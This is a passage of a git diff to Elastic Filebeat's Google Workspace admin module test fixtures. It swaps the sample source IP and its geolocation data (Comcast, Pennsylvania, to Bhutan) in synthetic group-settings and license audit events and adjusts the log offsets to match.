+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"GROUP_MEMBER_BULK_UPLOAD\",\"parameters\":[{\"name\":\"GROUP_MEMBER_BULK_UPLOAD_FAILED_NUMBER\",\"value\":\"0\"},{\"name\":\"GROUP_MEMBER_BULK_UPLOAD_TOTAL_NUMBER\",\"value\":\"10\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change",
@@ -555,26 +519,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 3906,
+        "log.offset": 3897,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -595,7 +555,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"GROUP_MEMBERS_DOWNLOAD\"}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"GROUP_MEMBERS_DOWNLOAD\"}}",
         "event.provider": "admin",
         "event.type": [
             "group",
@@ -607,26 +567,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 4370,
+        "log.offset": 4360,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -647,7 +603,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"CHANGE_GROUP_NAME\",\"parameters\":[{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"CHANGE_GROUP_NAME\",\"parameters\":[{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change",
@@ -663,26 +619,22 @@
         "group.domain": "example.com",
         "group.name": "group",
         "input.type": "log",
-        "log.offset": 4693,
+        "log.offset": 4682,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -703,7 +655,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"CHANGE_GROUP_SETTING\",\"parameters\":[{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"CHANGE_GROUP_SETTING\",\"parameters\":[{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change",
@@ -721,26 +673,22 @@
         "group.domain": "example.com",
         "group.name": "group",
         "input.type": "log",
-        "log.offset": 5112,
+        "log.offset": 5100,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -761,7 +709,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"WHITELISTED_GROUPS_UPDATED\",\"parameters\":[{\"name\":\"WHITELISTED_GROUPS\",\"value\":\"a,b,c\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"WHITELISTED_GROUPS_UPDATED\",\"parameters\":[{\"name\":\"WHITELISTED_GROUPS\",\"value\":\"a,b,c\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change",
@@ -778,26 +726,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 5611,
+        "log.offset": 5598,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
diff --git a/x-pack/filebeat/module/google_workspace/admin/test/admin-licenses-test.json.log b/x-pack/filebeat/module/google_workspace/admin/test/admin-licenses-test.json.log
index c028ff6ba1cb..a240d727301b 100644
--- a/x-pack/filebeat/module/google_workspace/admin/test/admin-licenses-test.json.log
+++ b/x-pack/filebeat/module/google_workspace/admin/test/admin-licenses-test.json.log
@@ -1,8 +1,8 @@
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"LICENSES_SETTINGS","name":"ORG_USERS_LICENSE_ASSIGNMENT","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"PRODUCT_NAME","value":"product"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"LICENSES_SETTINGS","name":"ORG_ALL_USERS_LICENSE_ASSIGNMENT","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"PRODUCT_NAME","value":"product"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"LICENSES_SETTINGS","name":"USER_LICENSE_ASSIGNMENT","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"USER_EMAIL","value":"user@example.com"},{"name":"PRODUCT_NAME","value":"product"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"LICENSES_SETTINGS","name":"CHANGE_LICENSE_AUTO_ASSIGN","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"SKU_NAME","value":"sku"},{"name":"PRODUCT_NAME","value":"product"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"LICENSES_SETTINGS","name":"USER_LICENSE_REASSIGNMENT","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"USER_EMAIL","value":"user@example.com"},{"name":"PRODUCT_NAME","value":"product"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"LICENSES_SETTINGS","name":"ORG_LICENSE_REVOKE","parameters":[{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"PRODUCT_NAME","value":"product"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"LICENSES_SETTINGS","name":"USER_LICENSE_REVOKE","parameters":[{"name":"OLD_VALUE","value":"old"},{"name":"USER_EMAIL","value":"user@example.com"},{"name":"PRODUCT_NAME","value":"product"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"LICENSES_SETTINGS","name":"UPDATE_DYNAMIC_LICENSE","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"PRODUCT_NAME","value":"product"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"LICENSES_SETTINGS","name":"ORG_USERS_LICENSE_ASSIGNMENT","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"PRODUCT_NAME","value":"product"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"LICENSES_SETTINGS","name":"ORG_ALL_USERS_LICENSE_ASSIGNMENT","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"PRODUCT_NAME","value":"product"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"LICENSES_SETTINGS","name":"USER_LICENSE_ASSIGNMENT","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"USER_EMAIL","value":"user@example.com"},{"name":"PRODUCT_NAME","value":"product"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"LICENSES_SETTINGS","name":"CHANGE_LICENSE_AUTO_ASSIGN","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"SKU_NAME","value":"sku"},{"name":"PRODUCT_NAME","value":"product"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"LICENSES_SETTINGS","name":"USER_LICENSE_REASSIGNMENT","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"USER_EMAIL","value":"user@example.com"},{"name":"PRODUCT_NAME","value":"product"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"LICENSES_SETTINGS","name":"ORG_LICENSE_REVOKE","parameters":[{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"PRODUCT_NAME","value":"product"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"LICENSES_SETTINGS","name":"USER_LICENSE_REVOKE","parameters":[{"name":"OLD_VALUE","value":"old"},{"name":"USER_EMAIL","value":"user@example.com"},{"name":"PRODUCT_NAME","value":"product"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"LICENSES_SETTINGS","name":"UPDATE_DYNAMIC_LICENSE","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"PRODUCT_NAME","value":"product"}]}}
diff --git a/x-pack/filebeat/module/google_workspace/admin/test/admin-licenses-test.json.log-expected.json b/x-pack/filebeat/module/google_workspace/admin/test/admin-licenses-test.json.log-expected.json
index c4dd9cdd54cc..dfe8f63bfed5 100644
--- a/x-pack/filebeat/module/google_workspace/admin/test/admin-licenses-test.json.log-expected.json
+++ b/x-pack/filebeat/module/google_workspace/admin/test/admin-licenses-test.json.log-expected.json
@@ -8,7 +8,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"LICENSES_SETTINGS\",\"name\":\"ORG_USERS_LICENSE_ASSIGNMENT\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"PRODUCT_NAME\",\"value\":\"product\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"LICENSES_SETTINGS\",\"name\":\"ORG_USERS_LICENSE_ASSIGNMENT\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"PRODUCT_NAME\",\"value\":\"product\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -25,23 +25,19 @@
         "log.offset": 0,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -62,7 +58,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"LICENSES_SETTINGS\",\"name\":\"ORG_ALL_USERS_LICENSE_ASSIGNMENT\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"PRODUCT_NAME\",\"value\":\"product\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"LICENSES_SETTINGS\",\"name\":\"ORG_ALL_USERS_LICENSE_ASSIGNMENT\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"PRODUCT_NAME\",\"value\":\"product\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -76,26 +72,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 463,
+        "log.offset": 462,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -116,7 +108,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"LICENSES_SETTINGS\",\"name\":\"USER_LICENSE_ASSIGNMENT\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"PRODUCT_NAME\",\"value\":\"product\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"LICENSES_SETTINGS\",\"name\":\"USER_LICENSE_ASSIGNMENT\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"PRODUCT_NAME\",\"value\":\"product\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -130,27 +122,23 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 930,
+        "log.offset": 928,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
             "user"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -174,7 +162,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"LICENSES_SETTINGS\",\"name\":\"CHANGE_LICENSE_AUTO_ASSIGN\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"SKU_NAME\",\"value\":\"sku\"},{\"name\":\"PRODUCT_NAME\",\"value\":\"product\"}]}}",
